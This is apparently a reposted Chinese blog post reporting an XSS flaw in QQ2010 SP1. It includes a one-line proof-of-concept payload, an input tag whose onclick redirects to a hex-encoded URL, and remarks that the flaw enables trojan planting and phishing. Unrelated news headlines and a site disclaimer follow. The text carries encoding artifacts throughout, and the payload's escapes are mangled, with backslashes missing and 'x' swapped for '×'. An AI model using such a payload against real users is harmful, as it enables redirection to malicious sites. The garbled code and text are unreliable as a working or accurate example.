剛才和Ken的聊天中他告訴我說QQ2010 SP1出漏洞了。我還不是很相信。不過經(jīng)過測試后,果真如此。
新版本是我今天早上給公司的電腦重裝完新系統(tǒng)下載安裝的,剛好是測試環(huán)境。

測試代碼:
<input onclick=”window.location=’x68×74x74×70x3ax2fx2fx77×77x77×2ex62×6fx77×6fx73×2ex63×6fx6d’” />
而出現(xiàn)如圖顯示

利用此漏洞可以掛馬 XSS 釣魚等邪惡的事情. 等待修復中…
相關閱讀
谷歌返華不遠:驚現(xiàn)中國版Google Play
亞馬遜觸犯眾怒 銷售自殺T恤太極端
斗魚因直播“造人”被調查 或將關停服務器整頓
斗魚直播回應“直播造人”:第一時間封停報警
美麗說蘑菇街合并案塵埃落定 推單CEO制
微軟推 windows 10 專用SIM卡 想要么?
蘋果將是特斯拉的墳墓 注冊多個汽車域名
強制升級?不!微軟只是在下一盤很大的棋
濟寧運河畔網(wǎng)版權與免責聲明:
①凡本網(wǎng)來源于注明來“源于:運河畔或damoshentu.com”版權均屬運河畔網(wǎng)所有,其他媒體可以轉載,且需注明“來源運河畔網(wǎng)”
② 凡本網(wǎng)注明“來源:XXX(非濟寧運河畔,濟寧信息港)”的作品,均轉載自其它媒體,轉載目的在于傳遞更多信息,并不代表本網(wǎng)贊同其觀點和對其真實性負責。
③ 如因作品內容、版權和其它問題需要同本網(wǎng)聯(lián)系的,請在30日內進行。